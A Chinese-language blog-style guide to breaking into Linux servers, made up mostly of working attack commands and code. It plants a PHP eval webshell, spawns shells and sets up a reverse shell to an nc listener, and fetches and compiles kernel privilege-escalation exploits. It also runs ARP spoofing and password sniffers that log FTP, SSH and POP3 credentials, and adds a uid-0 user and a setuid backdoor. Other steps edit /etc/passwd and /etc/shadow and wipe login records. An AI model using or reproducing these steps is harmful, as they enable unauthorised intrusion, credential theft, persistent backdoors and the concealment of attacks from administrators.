入侵Linux服务器常用命令

写个php一句话后门上去:

1
2
$ echo -e "<?php @eval($_POST[md5])?>" >rankuplog_time.php
​$ cat rankuplog_time.php

1.linux的想着先跨站。

shell浏览目标站不行,命令行下输入

1
ls -la /www.users/

2.溢出提权

1
# python –c ‘impotr pty;pty.spawn(“/bin/sh”);

来得到交互的Shell,一般的系统都默认安装python

输入id

1
2
3
bash-3.2$ id
uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)
bash-3.2$

这里uid=529(zeicom)还不是root权限,

输入uname –r
返回:2.6.18-164.11.1.el5PAE

2. Linux提权大致可分为

  • 第三方软件漏洞
  • 本地信任特性
  • 内核溢出

找对应的exp

这里地址整理很齐全可以这里下


  1. 命令输入pwd,这个命令是显示当前目录,
  2. 先看能不能编译 gcc -help
  3. 当前目录就是shell的目录,我在shell上传2.c
  4. 反弹shell 到外网自己机器的12345端口
  5. 上外网服务器 本地监听 nc -lvvp 12345

一般都能得到一个apache交互的shell 有时候又不行

这时候

1
# python -c  impotr pty;pty.spawn("/bin/sh");

然后

1
2
3
4
5
6
7
8
# 进入tmp目录 
cd /tmp
# 创建一个Papers的目录 Papers不显眼
mkdir Papers
# 进入 Papers目录
cd Papers
# 查看当前目录
pwd

然后命令输入

1
wget 下载exp的URL

把2.c编译成可执行文件 g++ keio.cc -o keio

1
gcc –o 2 2.c

给2有执行权限

1
chmod +x 2

执行2, 溢出

1
./2

执行

1
gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

确定arpsniffer.c需要先装pcap和 libnet。

1
2
3
4
5
6
7
8
9
10
11
12
13
rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
# 下载
wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0
# 解压
tar zxvf libpcap-0.8.1.tar.gz
# 进入目录
cd libpcap-0.8.1
# 执行
./configure
# 编译
make
# 安装
make install

重新编译arpsniffer.c
再次执行

1
gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

这次没报错,编译成功。
运行

1
./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254

3. 下面开始欺骗

由于是服务器端,因此我们欺骗网关:
(网络环境如下,邮件服务器ip:192.168.0.11 网关:192.168.0.1 本机:192.168.0.77)
执行

1
./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110

在另一个登录里面用tcpdump监听下

1
tcpdump -i eth0 host 192.168.0.11

发现有数据,把监听的数据存在文件里面:

1
tcpdump -i eth0 host 172.16.0.12 -w pop.txt

10分钟后停止,在SecureCRT下用sz命令下载pop.txt到本地,然后用Ethereal分析。

下面我们就可以用linsniffer监听我们想要的用户名和密码了。

先修改linsniffer.c:根据自己的需求监听相应的应用密码。我的如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
if(ntohs(tcp->dest)==21)  p=1; /* ftp */

if(ntohs(tcp->dest)==22) p=1; /* ssh for comparison added for example only comment out if desired*/

if(ntohs(tcp->dest)==23) p=1; /* telnet */

if(ntohs(tcp->dest)==80) p=1; /* http */

if(ntohs(tcp->dest)==110) p=1; /* pop3 */

if(ntohs(tcp->dest)==513) p=1; /* rlogin */

if(ntohs(tcp->dest)==106) p=1; /* poppasswd */

编译执行

1
[root@pibigstar root]# gcc -o linsniffer linsniffer.c

会提示下面

In file included from /usr/include/linux/tcp.h:21,
from linsniffer.c:32:
/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include <endian.h> instead!

不用管警告,直接运行编译后的linsniffer即可。

1
[root@pibigstar root]# ./linsniffer

用户名和密码都自动存到了tcp.log下。

4.利用跨站代码

linux不提权跨目录访问的代码

linux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。

在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。

代码如下:

1
2
3
4
5
6
7
8
9
$path = stripslashes($_GET[ path ]);

$ok = chmod ($path , 0777);

if ($ok == true)

echo CHMOD OK , Permission editable file or directory. Permission to write;

?>

把上面代码保存为tmdsb.PHP

然后访问http://www.tmdsb.com/tmdsb.php?path=../../要跨的目录/index.php

这里的index.PHP是要修改权限的文件。

收集的另一个exp:

把下面的代码保存为exp.PHP

代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
@$filename = stripslashes($_POST[ filename ]);

@$mess = stripslashes($_POST[ mess ]);

$fp = @fopen({$_POST[ filename ]}, a );

@fputs($fp,$mess

);

@fclose($fp);

?>

最终Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)这个0day溢出成功

5. udev提权

换了个udev提权,适用于内核范围为2.6.*。

还是上传文件至服务器shell所在目录,执行命令ls,发现文件已经躺在那里面了,之后赋予exp执行权限。

1
2
3
4
5
chmod +x pwnkernel.c

chmod +x wunderbar_emporium.sh

chmod +x exploit.c

之后执行./w*溢出

成功溢出,root权限。

之后就是留下一个后门~ 添加一个root权限用户俺也不介意。。。

1
useradd -u 0 -o "username"

依次输入命令

1
2
3
4
5
6
7
8
9
10
11
cd /tmp

ls /lib/ld-linux*

cp /lib/ld-linux.so.2 /tmp/.str1ven

ls -l .str1ven

chmod +s .str1ven

ls -l .str1ven

-rwsr-sr-x 1 root root 121684 07-08 21:13 .str1ven

成功建立一个后门,退出root,执行

1
./.str1ven `which whoami`

又成功获取root权限~~

1
2
3
4
5
6
7
8
9
10
11
12
# 查看linux用户
cat /etc/passwd
# 查看用户密码需要root权限
cat /etc/shadow
# N代表网卡号 查看所在网卡的ip信息
cat /etc/sysconfig/network-scripts/ifcfg-ethn
# 查看本机ip信息
ifconfig
# 查看DNS信息
cat /etc/resolv.conf
在反弹的shell中使用可以直观显示命令
bash -i

bash prompt:
当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt。当你以Root登陆时,你的prompt会变成bash#。

系统变量:
试着echo "$USER / $EUID"系统应该会告诉你它认为你是什么用户。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
echo 1>/proc/sys/net/ipv4/if_forward,1>/proc/sys/net/ipv4/ip_forward
# 修改,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理!
vim /proc/sys/net/ipv4/ip_forward
# 查看80端口的进程
netstat -an |grep LISTEN |grep :80 查看端口
# 服务正在运行的进程
service --status-all | grep running
# 服务为http的进程
service --status-all | grep http
# 查看系统版本
lsb_release -a

# 重启ssh服务 :
/usr/sbin/sshd stop/
usr/sbin/sshd start

ssd_config文件里

PasswordAuthentication no

将其改为

PasswordAuthentication yes

远程ssh才可登录

否则显示Access denied

其中Usepam yes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开.

su的菜鸟用法

1
chomod 777 /etc/passwd

然后修改bin用户的gid和uid为0

然后passwd设置bin的密码

然后

1
cp /bin/bash /sbin/nologin

然后su的时候

1
su - bin

就可以到rootshell了。

这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码的一种很菜鸟的做法。

还可以这样

1
2
3
4
5
6
7
8
9
10
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd

gcc prtcl2.c –o local –static –Wall

echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd

echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

# 清空last记录
cp /dev/null /var/log/wtmp

建立一个100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提权的时候要用到的

1
2
3
4
5
6
dd if=/dev/zero of=yourfile bs=10M count=10 

# 开22端口
/etc/init.d/ssh start
# SSH服务配置文件
/etc/ssh/sshd_config
-------------本文结束感谢您的阅读-------------